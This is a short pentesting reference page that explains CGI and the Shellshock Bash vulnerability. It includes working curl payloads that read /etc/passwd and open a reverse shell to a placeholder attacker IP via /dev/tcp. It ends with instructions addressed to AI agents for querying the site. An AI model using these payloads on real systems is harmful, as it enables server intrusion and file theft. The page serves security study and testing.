# CGI Applications ## **Introduction** > * A Common Gateway Interface (CGI) is used to help a web server render dynamic pages and create a customized response for the user making a request via a web application. > * CGI applications are primarily used to access other applications running on a web server. > * CGI is essentially middleware between web servers, external databases, and information sources. > * CGI scripts and programs are kept in the `/CGI-bin` directory on a web server > * Typically written in C, C++, Java, PERL, etc > * CGI scripts run in the security context of the web server *** ## **CGI Applications - Shellshock \[CVE-2014-6271]** > * The most well-known CGI attack is exploiting the Shellshock (aka, "Bash bug") vulnerability via CGI. > * **Resource:** > * **Affected Versions:** `GNU Bash up until version 4.3` > * **Description:** Shellshock is a security flaw in the Bash shell that allows an attacker to `execute operating system commands that are included after a function stored inside an environment variable.` > * **PoC Example:** `env y='() { :;}; echo vulnerable-shellshock' bash -c "echo not vulnerable"` > * Nothing will happen when the environment variable is assigned a value > * If the target is vulnerable, whenever the environment variable is imported, the command `echo vulnerable-shellshock` will be executed > * If the target is NOT vulnerable, then the command `echo not vulnerable` will be executed **Shellshock PoC to read any file:**\ `curl -H 'User-Agent: () { :; }; echo ; echo ; /bin/cat /etc/passwd' bash -s :'' http://target.com/cgi-bin/access.cgi` **Shellshock PoC to gain a Reverse Shell:**\ `curl -H 'User-Agent: () { :; }; /bin/bash -i >& /dev/tcp/your-ip/your-nc-port 0>&1' http://target.com/cgi-bin/access.cgi` --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://notes.sfoffo.com/web-applications/web-technologies/cgi-applications.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.